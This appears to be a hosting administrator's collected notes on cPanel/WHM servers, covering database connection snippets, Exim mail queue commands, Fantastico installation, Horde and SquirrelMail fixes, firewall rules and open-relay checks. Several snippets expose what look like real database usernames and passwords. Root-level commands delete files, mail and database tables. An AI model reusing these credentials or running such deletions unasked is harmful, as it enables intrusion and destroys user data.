"DBNAME"; $hostname = "db.YOURDOMAIN"; $port="3306"; $username="DBUSERNAME"; $password = "DBPASSWORD"; $dsn= "DBI:mysql:database=$database;host=$hostname;port=$port"; $dbh = DBI -> connect($dsn,$username,$password) or die ("Could not connect!"); $sql = "SELECT * FROM mytable"; $sth = $dbh->prepare($sql); $sth-> execute; while(($column1,$column2) = $sth->fetchrow_array) { print "C1=$column1, C2=$column2n"; } $dbh->disconnect;<?php $Host = "localhost"; //you can use IP address instead of localhost $User = "everesti_user1"; $Password = "chri1234"; $Database = "everesti_RP"; $Link_ID=mysql_pconnect($Host, $User, $Password); if(!$Link_ID) { echo"Failed"; return 0; } else { echo "Connection to the database - successful"; } if(!@mysql_select_db($Database,$Link_ID)) { echo "<br>cannot use Database=".$Database; } else { echo "<br>connected to Database=".$Database; } ?> $Host = "localhost"; //you can use IP address instead of localhost $User = "freeftaf_protow"; $Password = "123456"; $Database = "freeftaf_freeftafiles"; define('DB_SERVER', 'localhost'); define('DB_SERVER_USERNAME', 'masjid_osc1'); define('DB_SERVER_PASSWORD', 'iioY7bkNKHhU'); define('DB_DATABASE', 'masjid_osc1'); "66.7.215.126:3306","soeconco_step54","step8354") iptables -I INPUT -p tcp --dport 80 -i eth0 -m state --state NEW -m recent --update --seconds 60 --hitcount 10 -j DROP iptables -I INPUT -p tcp --dport 80 -i eth0 -m state --state NEW -m recent --update --seconds 60 --hitcount 10 -j DROP ddos attack : netstat -apn http://www.linuxsecurity.com/content/view/121960/49/ http://blog.readywire.com/2008/11/ddos-attack/ http://kmaiti.blogspot.com/2010/11/install-firewalls-on-linux.htmlroot@king [/var/cpanel/userdata/isulahos]# /scripts/restartsrv_ipaliasesFollowing command shows listing of files which does not match html and php type. find . \( \! -name "*\.html" \! -name "*\.php" -type f \) -print http://www.techtalkz.com/unix/78073-delete-files-except-certain-ones.htmldig mx software-bridge.com | grep MXDisabling paypal phishing sites via modsec2.conf : below is the procedure : [2:32:50 AM] vulgar: login to vision server [2:33:36 AM] vulgar: logged in ? [2:33:43 AM] adminhost: yes [2:33:47 AM] vulgar: cat /etc/httpd/conf/modsec2.conf [2:34:01 AM] vulgar: do you see the line SecRule REQUEST_URI "webscr.php" [2:34:11 AM] adminhost: yes [2:34:26 AM] vulgar: this will disable all paypal phishing sites on server [2:34:41 AM] vulgar: now we have to add this line to every server in that file [2:34:51 AM] adminhost: ok, will add it now [2:34:53 AM] vulgar: just above the line Include "/usr/local/apache/conf/modsec2.user.conf" [2:34:57 AM] vulgar: and restart httpd [2:35:01 AM] adminhost: ok [2:35:06 AM] vulgar: be carefull in syntax [2:35:11 AM] adminhost: ok [2:35:14 AM] vulgar: and do it for all 4 projects [2:35:18 AM] vulgar: all servers [2:35:19 AM] adminhost: yes [2:35:31 AM] vulgar: only not the main server on which we have main websitesDisable Magic_quotes_gpc In A .htaccess File How do I disable magic quotes via .htaccess? I put the following file in my webroot, but it does not disable magic_quotes_gpc (according to phpinfo(), both the local and master value are still "on") <IfModule mod_php4.c> php_value upload_max_filesize 8M php_value magic_quotes_gpc 0 </IfModule> The change to upload_max_filesize works (master is 2M, local value is 8M, according to phpinfo()) ************************************************************************** The wrong statement is: # php_value magic_quotes_gpc on The correct syntax is: php_flag magic_quotes_gpc on to find and delete all files like .rar, .mp3, avi, mpeg fire this command and after that files gets stored in /home/delete of the server. find /home/*/public_html/ -iname '*.rar' -exec mv "{}" /home/delete \; find /home/*/public_html/ -iname '*.mp3' -exec mv "{}" /home/delete \; find /home/*/public_html/ -iname '*.mpeg' -exec mv "{}" /home/delete \; find /home/*/public_html/ -iname '*.avi' -exec mv "{}" /home/delete \; find /home -name "*" -size +100000k find */public_html/* -name .pure* find /home/*/public_html/ -iname '*.pure' -exec mv "{}" /home/delete \; 3ware /c0 showi get these 2 errors on top of the page: Warning: Division by zero in /home/gmistake/public_html/catalog/includes/classes/shipping.php on line 61 Warning: Division by zero in /home/gmistake/public_html/catalog/includes/classes/shipping.php on line 62 i believe those 2 lines are: $shipping_num_boxes = ceil($shipping_weight/SHIPPING_MAX_WEIGHT); $shipping_weight = $shipping_weight/$shipping_num_boxes; Go to Admin -> Configuration -> Shipping/Packaging ->Enter the Maximum Package Weight you will ship Make sure that is NOT Zero. http://www.hostdime.com/support/forms/copyright_claim_form.pdfDolphin installation error : XsltProcessor is Off, you should install XsltProcessor Please go to the Dolphin Troubleshooter and solve the problem. : You need to install this PHP extension: XSL See here for full list of requirements: http://www.boonex.com/trac/dolphin/wiki/DolTech **************** Dolphin Hosting Requirements Default Dolphin installation works with most common configurations of hosting server, however, since Dolphin is a package with multiple scripts and apps, it is very important to ensure that all of the following requirements are met. Most of the technical problems occur due to improper server setup, so make sure that your hosting provider is Dolphin-compatible. To help avoid trouble, we gathered a number of Recommended Hosting Providers that have Dolphin-ready accounts and experience with managing accounts that have Dolphin installed. Some of them offer instant installation or even pre-installed Dolphin. Providing that the server is properly configured, it is possible to run Dolphin on a shared hosting account. We do recommend, however, to have a VPS or a Dedicated Server for Dolphin. ========== Server Requirements ========== Linux/Unix (Red Hat, Debian, FreeBSD, Mandrake, etc.) or Windows OS Apache Web Server ver. 1.3 or higher. PHP 5.2.0 or higher. register_globals must be Off safe_mode must be Off exec() (executable files) must be allowed allow_url_fopen should be On allow_url_include should be Off open_basedir should not have any value memory_limit should be 128M or higher mbstring, gd and xslt extensions must be installed. MySQL 4.1.2 and higher. The magic_quotes_gpc option must be disabled for Dolphin 7.x, but enabled for Dolphin 6.x. If security module is installed (such as mod_security for Apache), it should be able to be configured for specific folders (or disabled). Direct connection to boonex.com should be able to be established (i.e. connection without requiring proxy authorisation). This is required for license verification. GD library compiled with FreeType fonts (for photo processing) or ImageMagick as an alternative. Sendmail or Postfix programs for sending emails. Ability to create Cron Jobs. You should be able to run executable files (you would need it for ffmpeg.exe, which converts videos). Server Requirements for Media Streaming Some of the Dolphin's features (such as Flash Chat, Flash IM, Boards, Video Recorder, Video Comments) require media streaming capabilities. To use those, you need to make sure that the following requirements are met: VPS or Dedicated server is generally required in order to be able to install and run RMS (Ray Media Server). You would need an access to root or administrator account on the hosting server. JRE (Java Runtime Environment) ver. 1.6 or higher should be installed. Ports 1935, 1936 and 5080 should be open on the server. Allowance of at least 15 KB/sec for media streaming for each user. It is a good idea to send the list above to your hosting provider to make sure the server is ready for installation. If all the above requirements are met you are all set to proceed to Dolphin Installation. Recommended Hosting Providers Over years we worked with many different hosting providers and some of them are very experienced when it comes to managing Dolphin sites. Going for one of our Recommended Hosting Providers is a good idea for both starters and those willing to work with companies that have Dolphin-experience. Most of our hosting partners provide automatic Dolphin installation and special discounts for Dolphin users. Recommended Server Setup Since Dolphin is a resource-intensive platform, it is very important to "fine-tune" your server. In some cases (for popular sites) you may have to setup servers-cluster, and/or remove database server. Alternative "web-server" software, such as nginx may also be beneficial to your site performance. Please refer to Hosting Server Setup Recommendations for the details on how you can tune-up your server. E-mail Configuration > Microsoft Outlook 2007 http://www1.umn.edu/adcs/guides/email/winoutlook2007mam, is it possible to get a backup for any perticular email account ? [1:54:11 PM] vulgar: yes from whm --restore backup -- select username-- select mail and restoreEmail Piping with Cpanel http://www.activecampaign.com/support/tt/index.php?action=kb&article=331 http://www.daniweb.com/forums/thread55673.html What is SSI : How to enable SSI (Server Side Include) support on an Apache web server Server Side Include (or SSI) is a useful feature that enables you to do things like include files into your web pages. The most common use for this feature is to allow you to design a navigation bar, put it in a separate file and then include that in all of your web pages. When you need to change the navigation bar you change just the include file, not every web page on your server. The change in the include file simply propogates through all the pages that include it. ============================================================================ http://broadbandforum.in/web-services/53-enable-ssi-apache-using-htaccess-file/ ============================================================================ To enable the SSI ( Server Side Includes ) you have to put the following code inside .htaccess file. AddType text/html .shtml .html .htm AddHandler server-parsed .shtml .html .htm Options Indexes FollowSymLinks Includes ============================================================================ Read more: http://broadbandforum.in/web-services/53-enable-ssi-apache-using-htaccess-file/#ixzz0ULxf0WPm http://forums.solidhost.com/showthread.php?t=440 http://www.webhostingtalk.com/showthread.php?t=623960 http://www.techcuriosity.com/resources/exim/exim.php http://forums.spry.com/cpanel-whm/1373-helpful-exim-commands.html Files in /var/spool/exim/msglog contain logging information for each message and are named the same as the message-id. Files in /var/spool/exim/input are named after the message-id, plus a suffix denoting whether it is the envelope header (-H) or message data (-D). These directories may contain further hashed subdirectories to deal with larger mail queues, so don't expect everything to always appear directly on the top /var/spool/exim/input or /var/spool/exim/msglog directories; any searches or greps will need to be recursive. See if there is a proper way to do what you're doing before working directly on the spool files. Queues information 1) Print a count of the messages in the queue: Quote: root@localhost# exim -bpc 2) Print a listing of the messages in the queue (time queued, size, message-id, sender, recipient): Quote: root@localhost# exim -bp 3) Print a summary of messages in the queue (count, volume, oldest, newest, domain, and totals): Quote: root@localhost# exim -bp | exiqsumm -----------------------------------------------------> 4) Generate and display Exim stats from a logfile: Quote: root@localhost# eximstats /path/to/exim_mainlog 5) Generate and display Exim stats from a logfile, with less verbose output: Quote: root@localhost# eximstats -ne -nr -nt /path/to/exim_mainlog 6) Generate and display Exim stats from a logfile, for one particular day: Quote: root@localhost# fgrep 2007-02-16 /path/to/exim_mainlog | eximstats 7) Print what Exim is doing right now: Quote: root@localhost# exiwhat 8) To delete frozen emails Quote: exim -bp | awk '$6~"frozen" { print $3 }' | xargs exim -Mrm 9) To deliver emails forcefully Quote: exim -qff -v -C /etc/exim.conf & -------------------------- provides the error logs also ********************************************************************************************************** It may be useful to someone, sometimes the queded mail list gets gigantic because of some spammer and other emails that aren't spam could get deleted when using cPanel to control it. The better solution would obviously be to prevent spammers of sending all those mails, if you know a better solution on cPanel 11 please share it with me. ==== REMOVE MAILS BY ID ==== /usr/sbin/exim -v -Mrm (MAIL ID HERE) ==== LIST QUEDED MAILS ==== /usr/sbin/exim -bp ==== OUTPUT NUMBER OF QUEDED MAILS ==== /usr/sbin/exim -bpc ==== DELETE FROZEN MAILS ==== /usr/sbin/exim -bp | awk '$6~"frozen" { print $3 }' | xargs exim -Mrm ==== DELIVER FORCEFULLY EMAILS ==== /usr/sbin/exim -qff -v -C /etc/exim.conf & ==== FREEZE MAILS FROM SENDER ==== /usr/sbin/exiqgrep -i -f (MAIL ADDRESS HERE) | xargs exim -Mf ==== REMOVE MAILS FROM SENDER ==== /usr/sbin/exiqgrep -i -f (MAIL ADDRESS HERE) | xargs exim -Mrm **************************************************************************************************** >> Count the number of messages in the queue. root@localhost# exim -bpc >> Listing the messages in the queue (time queued, size, message-id, sender, recipient). root@localhost# exim -bp >> Print a summary of messages in the queue (count, volume, oldest, newest, domain, and totals). root@localhost# exim -bp | exiqsumm >> Check what Exim is doing right now. root@localhost# exiwhat >> Test how exim will route a given address. root@localhost# exim -bt user@localdomain.com >> Display Exim's configuration settings. root@localhost# exim -bP >> Search the queue for messages from a specific sender. root@localhost# exiqgrep -f [luser]@domain >> Search the queue for messages for a specific recipient/domain. root@localhost# exiqgrep -r [luser]@domain >> Print messages older than the specified number of seconds. Eg: messages older than 1 hour. root@localhost# exiqgrep -o 3600 [...] >> Print messages younger than the specified number of seconds. Eg: messages less than an hour old. root@localhost# exiqgrep -y 3600 [...] >> Match the size of a message with a regex. Eg: Messages between 500-599 bytes. root@localhost# exiqgrep -s '^5..$' [...] >> Match only frozen messages. root@localhost# exiqgrep -z >> Match only frozen messages. root@localhost# exiqgrep -x >> Print just the message-id of the entire queue. root@localhost# exiqgrep -i >> Start a queue run. root@localhost# exim -q -v >> Start a queue run for just local deliveries. root@localhost# exim -ql -v >> Remove a message from the queue. root@localhost# exim -Mrm <message-id> [ <message-id> ... ] >> Freeze a message. root@localhost# exim -Mf <message-id> [ <message-id> ... ] >> Thaw a message. root@localhost# exim -Mt <message-id> [ <message-id> ... ] >> Deliver a message, whether it's frozen or not, whether the retry time has been reached or not. root@localhost# exim -M <message-id> [ <message-id> ... ] >> Deliver a message, but only if the retry time has been reached. root@localhost# exim -Mc <message-id> [ <message-id> ... ] >> Force a message to fail and bounce as "cancelled by administrator". root@localhost# exim -Mg <message-id> [ <message-id> ... ] >> Remove all frozen messages. root@localhost# exiqgrep -z -i | xargs exim -Mrm >> Remove all messages older than five days (86400 * 2 = 172800 seconds). root@localhost# exiqgrep -o 172800 -i | xargs exim -Mrm >> Freeze all queued mail from a given sender. root@localhost# exiqgrep -i -f user@example.com | xargs exim -Mf >> View a message's headers. root@localhost# exim -Mvh <message-id> >> View a message's body. root@localhost# exim -Mvb <message-id> >> View a message's logs. root@localhost# exim -Mvl <message-id> >> Add a recipient to a message. root@localhost# exim -Mar <message-id> <address> [ <address> ... ] >> Edit the sender of a message. root@localhost# exim -Mes <message-id> <address> ********************************************************************************************************************** This is a list of some of the commands I commonly use when troubleshooting exim: exim -bp|grep $name Will show the mail in queue for $name exim -Mvh $MSGID View message header exim -Mvb $MSGID View message body exim -M $MSGID Force delivery of message exim -v -M $MSGID View the transact of message Force delivery of one message exim -M email-id Force another queue run exim -qf Force another queue run and attempt to flush the frozen message exim -qff View the log for the message exim -Mvl messageID View the body of the message exim -Mvb messageID View the header of the message exim -Mvh messageID Remove message without sending any error message exim -Mrm messageID Giveup and fail message to bounce the message to the Sender exim -Mg messageID How much mail in the queue? exim -bpr | grep "<" | wc -l How many Frozen mails in the queue exim -bpr | grep frozen | wc -l Deleteing Frozen Messages exim -bpr | grep frozen | awk {'print $3'} | xargs exim -Mrm ---------------> this can be execute only. To find out, how many messages are there in the mail queue: exim -bpc To check the mails in the queue: exim -bp To force exim update: /scripts/eximup --force ******************************************************************************************************************* to find spammer go to /var/spool/exim/input/ root@supra [/var/spool/exim/input]# egrep "X-PHP-Script" * -R egrep "X-PHP-Script" * -R Fantastico installation : Here are the steps to download Fantastico & install it onto your server : Connect to your server using an SSH client. Login as the root user. Change to the proper cgi folder using the following command: cd /usr/local/cpanel/whostmgr/docroot/cgi Download the Fantastico install file using the following command: wget http://www.netenberg.com/files/free/..._whm_admin.tgz Extract the install file using the following command: tar -xzpf fantastico_whm_admin.tgz Remove the install file using the following command: rm -rf fantastico_whm_admin.tgz Re-Login to WHM in a web browser inorder for the above done changes to come into effect. From the menu, under Plugins, click Fantastico De Luxe WHM Admin (usually located at the bottom of the Main Menu). Refer this link if you get any errors while the installation process : Fantastico http://www.eukhost.com/forums/f15/how-install-fantastico-linux-server-vps-4452/ *************** OR : http://discussion.accuwebhosting.com/cpanel-whm-control-panel/396-how-install-fantastico-via-ssh-whm.html How to Install Fantastico via SSH and WHM Hello All, Below mentioned are the steps to install Fantastico on Linux server via SSH access and WHM: 1) Login via SSH to your server and enter following commands: cd /usr/local/cpanel/whostmgr/docroot/cgi wget http://www.netenberg.com/files/free/..._whm_admin.tgz tar -xzpf fantastico_whm_admin.tgz rm -rf fantastico_whm_admin.tgz 2) Now go to WHM, login as root and follow the link WHM -> Add-Ons -> Fantastico De Luxe WHM Admin. One need to complete the installation by following the online screens. Note: If you will receive a license error and you are sure that your package includes Fantastico, then contact your data center technical support and have them license the server IP. ======================================= You can use foloowing steps : http://www.linuxsurgeon.org/kb/howto-install-fantastico.html Hi, Today i am installing fantastico on my linux server but i am getting some problem.I have installed properly but i am not able to see Fantastico in Cpanel so i searched on google and found a solution after a long time so i thought for people who are suffering from same problem so i put this article on my site for the Linux guys …………….. # SSH to your server and enter following commands: ————————————————————————————————————————————- cd /usr/local/cpanel/whostmgr/docroot/cgi wget -N http://files.betaservant.com/files/free/fantastico_whm_admin.tgz tar -xzpf fantastico_whm_admin.tgz rm -rf fantastico_whm_admin.tgz ————————————————————————————————————————————- NOTE: if you have problems contacting this server, please try this alternate location: wget -N http://netenberg.com/files/free/fantastico_whm_admin.tgz ————————————————————————————————————————————- Go to WHM, login as root and click on Tweak Settings, then you should ensure that both the Ioncube loader is selected for the backend copy of PHP. Save changes. Now go here: WHM -> Add-Ons (Plugins on v11.x or higher) -> Fantastico De Luxe WHM Admin (scroll down the left menu). Upon loading, Fantastico De Luxe WHM Admin will auto-update your existing installation (if existing). All admin files (masterfiles, tarballs, settings etc) will be moved to or created at /var/netenberg. ————————————————————————————————————————————- After the installation is complete, click on “Settings” and go through the settings. While some settings are not important, some other (marked below with an *) are essential for a proper functioning of Fantastico installations. Language: Select the language for the admin backend AND default language for users without a language selected. Email notifications: Enter an email address in order to receive notifications when users perform installations using Fantastico. Master files settings (*): If you are not an advanced user who modifies the master files, leave this to “Remove”. Change this only if you know what you are doing. PHPsuexec (*): VERY ESSENTIAL!!! Changing this value will not install or de-install phpsuexec for you. It will only tell Fantastico that you have phpsuexec installed or not installed on your server. Change to “installed” if you perform installations which produce an “Internal Server Error”. Notice: Changes will not apply to existing installations! You have to re-install in order to have working installations. Path to netPBM: Enter the full path to the netPBM binaries in order to enable Gallery installations. As long as this field has no value, your users will not be able to install Gallery. Select Fantastico licensing and files server: If the Fantastico pages take long to load switch to the server that works best for you. Fantastico will auto-switch if connections time out. Update preference: Select latest version (sometimes experimental) or stable version (best working). ————————————————————————————————————————————- Now you have installed Fantastico perfectly.Go to Cpanel and check it r u able to see Fantastico under Cpanel or not ? If you are not able to see then Follow the steps. ————————————————————————————————————————————- If it is wget-1.10.2-3.3.fc5 or wget-1.10.2-8.fc6.1, or any version that yum installs on those OSes (they will typically end with .fc5 or .fc6 or .el5) we suggest that you replace it immediately with an older and/or stabler version. This version does not honor the “-P” switch. An alternate version that we know works is wget-1.10.2-3.2.1 (though more recent versions should also work). You can use the following commands for this purpose. For 32-bit: ————————————————————————————————————————————– rpm -qa wget ; wget ftp://ftp.funet.fi/pub/mirrors/ftp.redhat.com/pub/fedora/linux/core/5/i386/os/Fedora/RPMS/wget-1.10.2-3.2.1.i386.rpm chattr -ia /usr/bin/wget rpm -e wget ; rpm -ivh –force wget-1.10.2-3.2.1.i386.rpm ; rpm -qa wget ; ————————————————————————————————————————————– For 64-bit: ————————————————————————————————————————————– rpm -qa wget ; wget http://download.fedora.redhat.com/pub/fedora/linux/releases/7/Everything/x86_64/os/Fedora/wget-1.10.2-15.fc7.x86_64.rpm ; chattr -ia /usr/bin/wget rpm -e wget ; rpm -ivh –force wget-1.10.2-15.fc7.x86_64.rpm ; rpm -qa wget ; ————————————————————————————————————————————– Now reinstall your Fantastico and check it ………………..Its Done !!! ————————————————————————————————————————————– Uninstall Fantastico ————————————————————————————————————————————– UNINSTALL FANTASTICO rm -rf /var/netenberg/fantastico_de_luxe/ rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/fantastico/ rm -rf /usr/local/cpanel/3rdparty/fantastico* rm -rf /usr/local/cpanel/base/frontend/*/fantastico rm -f /usr/local/cpanel/base/frontend/x/cells/fantastico.html rm -f /usr/local/cpanel/whostmgr/docroot/cgi/addon_fantastico.cgi ————————————————————————————————————————————–Word press error : Fatal error: Allowed memory size of 33554432 bytes exhausted Open wp-settings.php and set memory limit define('WP_MEMORY_LIMIT', '64M'); Also Check all these URL's http://support.uk-vps.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=10 http://www.mycutelife.net/sanju/help1/mailissue http://helpdesk.hostmonster.com/index.php/kb/article/372 Error from Squirremail : 1)grep -rl ahoo.co.in /var/spool/exim/input/ | xargs rm this will delete the mails from ythe queue which consist of ahoo.co.in ******************************************************************************************************** 2) exim -bp |exiqsumm exim -bp | exiqsumm | awk '{if ($1 >100)print $0 }' | sort -n this will show the no of mails for each domain to find who is sending mails ps -C exim -fH eww ******************************************************************************************************** 3) error in webmail ----------------------------- Email delivery error Server replied: 1 Can't execute command '/usr/local/cpanel/bin/sendmail_cpanel -i -t -ftest@domainname.com'. ----------------------------- Email delivery error Server replied: 255 Can't execute command '/usr/local/cpanel/bin/sendmail_cpanel -i -t -ftest@philadelphiamaven.com'. ----------------------------- Can't execute command '/usr/local/cpanel/bin/sendmail_cpanel -i -t -f in squirrelmail Solution Quite a hard one to track down this one :- First SSH into your server and run :- /scripts/fixeverything /scripts/upcp --force /scripts/eximup --force if that does not fix the issue run the following commands:- cd /usr/sbin mv sendmail sendmail.157979 ln -s /usr/sbin/exim /usr/sbin/sendmail mv /etc/eximmailtrap /etc/eximmailtrap.157979 All sorted, it should be. one more fix is given below. root@abc [~]# cd /usr/sbin root@abc [/usr/sbin]# mv sendmail sendmail.157979 root@abc [/usr/sbin]# ln -s /usr/sbin/exim /usr/sbin/sendmail root@abc [/usr/sbin]# mv /etc/eximmailtrap /etc/eximmailtrap.157979 Exim e-mail filtering doesn't work for maildir Currently cpanel e-mail filtering only supports mbox format. Here is a workaround for maildir ############################### vi /etc/exim.conf Under DIRECTORS CONFIGURATION (there are two section file_transport under DIRECTORS CONFIGURATION. Just add the below line with the first file_transport = address_file section.) Under file_transport = address_file add the line directory_transport = address_directory example----->> -------------------------------------- central_filter: #!!# filter renamed allow_filter driver = redirect allow_filter no_check_local_user file = /etc/vfilters/${domain} file_transport = address_file directory_transport = address_directory pipe_transport = virtual_address_pipe reply_transport = address_reply retry_use_local_part user = "${lookup{$domain}lsearch* {/etc/userdomains}{$value}}" no_verify -------------------------------------- Under TRANSPORTS CONFIGURATION add the following lines address_directory: debug_print = "T: address_directory for $local_part@$domain" driver = appendfile envelope_to_add = true return_path_add = true check_string = "" escape_string = "" maildir_format chattr +ia /etc/exim.conf /etc/init.d/exim restart &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& mbox to maildir conversion of single account working one is the first =========================================================================== Use this custom script to convert single mbox files to maildir format Convert mbox to maildir wget http://batleth.sapienti-sat.org/projects/mb2md/mb2md-3.20.pl.gz gunzip mb2md-3.20.pl.gz ./mb2md-3.20.pl -s path_to_inbox =========================================================================== download this http://perfectmaildir.home-dn.net/perfect_maildir/perfect_maildir.pl usage ./perfect_maildir.pl ~Maildir/ <mbox.file one example is given below ./perfect_maildir.pl /home/harrison/mail/cur < /home/harrison/mail/inbox &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& http://forums.cpanel.net/showthread.php?t=54012&highlight=address+book error No browseable address books fix Edit the file: /usr/local/cpanel/base/horde/turba/config/sources.php on the server with your favorite command line editor. Look for a line of code that reads like: Code: 'public' => false, 'readonly' => false, 'admin' => array(), 'export' => true Should be around line 132 I believe. Add 'browse' => true, to this section of code, so that it reads as: Code: 'public' => false, 'readonly' => false, 'admin' => array(), 'browse' => true, 'export' => true Then just save the file and log back into Horde. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& ------------------------------------------------------------ loops back to login page in horde solution mysql mysql> use horde; mysql> drop table horde_sessionhandler; mysql> CREATE TABLE horde_sessionhandler ( session_id VARCHAR(32) NOT NULL, session_lastmodified INT NOT NULL, session_data LONGBLOB, PRIMARY KEY (session_id) ) ENGINE = InnoDB; ------------------------------------------------------------ &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& address book missing http://forums.cpanel.net/showthread.php?t=43342&highlight=address+book I found the error I had was caused by a wrongly named file in: /usr/local/cpanel/base/horde/turba/scripts/upgrades/ 1.2_to_2.0.sql should have been 1.2_to_2.0.mysql.sql To fix: cd /usr/local/cpanel/base/horde/turba/scripts/upgrades/ If the file is wrongly named, rename it: mv 1.2_to_2.0.sql 1.2_to_2.0.mysql.sql Or scp it over from another server with the correct filename /usr/local/cpanel/bin/updatehorde &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& horde issue login page again and again if you recently made changes to your my.cnf file, see if you have skip-innodb if do, comment it out. #skip-innodb Reply With Quote squirrelmail error missing folders solution http://squirrelmail.org/wiki/MissingFolders Check Options->Folder Preferences->Show only subscribed folders. Try subscribing to those folders. Click "Folders" choose you folder(s), you can do multi-select, and click "Subscribe." If this does not work it may be because SquirrelMail is configured for the wrong type of IMAP server, or does not support your IMAP server. If the folders were not even listed, it is quite possible that they were stored on your local machine. Fire up your old mail reader and move the folders back onto the IMAP server. Admins, please note that if your IMAP server is not listed that does NOT mean that it won't work. It just means that there are no "special" options (a.k.a. work-arounds) for your particular server. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& spamassaqssin upgrade vi /home/.cpcpan/modules.versions then change the version /scripts/installspam &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& /scripts/convert2maildir is not working. change the entry courier to 0 in /var/cpanel/cpanel.config &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& Hello, The issue is that, previously server was running with mbox format with mails. Now these days cpanel is supporting maildir format as mbox is having many reported issues. In mbox format Individual messages are simply concatenated together, and saved in a single file. A special marker is placed where one message ends and the next message begins. Only one process can access the mbox file in read/write mode. Concurrent access requires a locking mechanism. Anytime someone needs to update the mbox file, everyone else must wait for the update to complete. In maildir format Individual messages are saved in separate files, one file per message. There is a defined method for naming each file. There's a defined procedure for adding new messages to the maildir. No locking is required. Multiple processes can use maildirs at the same time. We are running the script to convert all mbox formatted mails to maildir format so as to fix the mail issue and it will take some more time for the completition. We really sorry for the inconvenience caused and we will update you once this is over. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& squirrelmail issue ERROR: Connection dropped by IMAP server Courier-IMAP is linked against libfam, and that library is probably missing. Use SSH for the following: How to check root@server# ldd /usr/lib/courier-imap/bin/imapd libfam.so.0 => not found libgdbm.so.2 => /usr/lib64/libgdbm.so.2 (0x0000002a9566c000) libcourierauth.so.0 => /usr/lib64/courier-authlib/libcourierauth.so.0 (0x0000002a95772000) libc.so.6 => /lib64/tls/libc.so.6 (0x0000002a9587c000) /lib64/ld-linux-x86-64.so.2 (0x0000002a95556000) How to fix root@server# yum install gamin &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& ********************************************************************************************************* crontab -l -u username ( where l = list crontab) crontab -e -u username ( where e = edit crontab ) ********************************************************************************************************* What is SSI : How to enable SSI (Server Side Include) support on an Apache web server Server Side Include (or SSI) is a useful feature that enables you to do things like include files into your web pages. The most common use for this feature is to allow you to design a navigation bar, put it in a separate file and then include that in all of your web pages. When you need to change the navigation bar you change just the include file, not every web page on your server. The change in the include file simply propogates through all the pages that include it. ============================================================================ http://broadbandforum.in/web-services/53-enable-ssi-apache-using-htaccess-file/ ============================================================================ To enable the SSI ( Server Side Includes ) you have to put the following code inside .htaccess file. AddType text/html .shtml .html .htm AddHandler server-parsed .shtml .html .htm Options Indexes FollowSymLinks Includes ============================================================================ Read more: http://broadbandforum.in/web-services/53-enable-ssi-apache-using-htaccess-file/#ixzz0ULxf0WPm ********************************************************************************************************* You are on a an ISP that blocks their users from using any SMTP server other than their own. Your solution is as follows: 1. To setup your ISP's SMTP servers for your outgoing email, you must click on your account settings in the email client you are using. 2. In the SMTP (outgoing mail server) field, you will enter the SMTP server address for your ISP, such as smtp.yourisp.com. You must then enter the username and password for your ISPs mail server. For a list of ISPs and their SMTP server address, please click here. 3. In Outlook Express, this is at the bottom of that same tab. You must uncheck My server requires authentication and click on Settings to enter the username and password for your ISP. Your email will still be from your own domain name, the only difference is in the way it is routed throughout the internet. Instead of being sent through our servers, it is processed through your ISP. This allows your ISP to monitor your email in case of a spam complaint. ********************************************************************************************************* Check if the server ip is open relay http://www.checkor.com/ Also check at http://www.spamhelp.org/shopenrelay/ ============================================================================ What is an open relay? An open relay (sometimes also referred to as a third-party relay) is a mail server that does not verify that it is authorised to send mail from the email address that a user is trying to send from. Therefore, users would be able to send email originating from any third-party email address that they want. ============================================================================ Why is an open relay bad? Spammers are constantly on the lookout for open relay SMTP (Simple Mail Transfer Protocol) servers. They use the open relays to send unsolicited mail to a large number of email addresses, which has an impact on delivery speed, bandwidth, disk storage space, CPU processing and more. A number of organisations are cracking down on spam originating from open relay servers by forming blacklists. Several anti-spam solutions check if the mailserver is in one of these blacklists before allowing incoming mail from it. If your mail server gets listed on one of these blacklists, a lot of the emails that you would be sending would not be reaching their destination. ============================================================================ What software blocks spam from open relays? If your open relay is found by a blacklist organisation (usually if someone reports spam coming from your mail server), it would be blacklisted. There are loads of solutions (services, software and appliances/hardware) that block mail from mailservers listed in these blacklists. Many of these are implemented at a server level (eg by ISPs, company mail servers etc) even though not all client-based solutions have this feature. If you are interested in finding software to block spam, you can browse our software section or alternatively take a look at our customizable server-based anti-spam software feature comparison; you can check out the ones listed which have public blacklist support here or else tweak the settings yourself here. Also, you might be interested in taking a look at our services section (eg managed anti-spam solutions) or our appliances section (machines built specifically to stop spam). ============================================================================ How do I close my open relay? If you are a system administrator interested in closing down your open relay (if you have an open relay, then you should!), you can check out the great list maintained by MAPS at http://www.mail-abuse.com/an_sec3rdparty.html. Where can I get more technical info on the Simple Mail Transfer Protocol (SMTP)? You may read the original Request For Comments (RFC 821) by Jonathan B. Postel, August 1982 and the improved version (RFC 2821) by The Internet Society, April 2001. The latter also makes RFC 974 and RFC 1869 obsolete. ============================================================================ To close the open relay run the follwing script from the server : /scripts/fixrelayd /etc/rc.d/init.d/antirelayd restart service exim restart 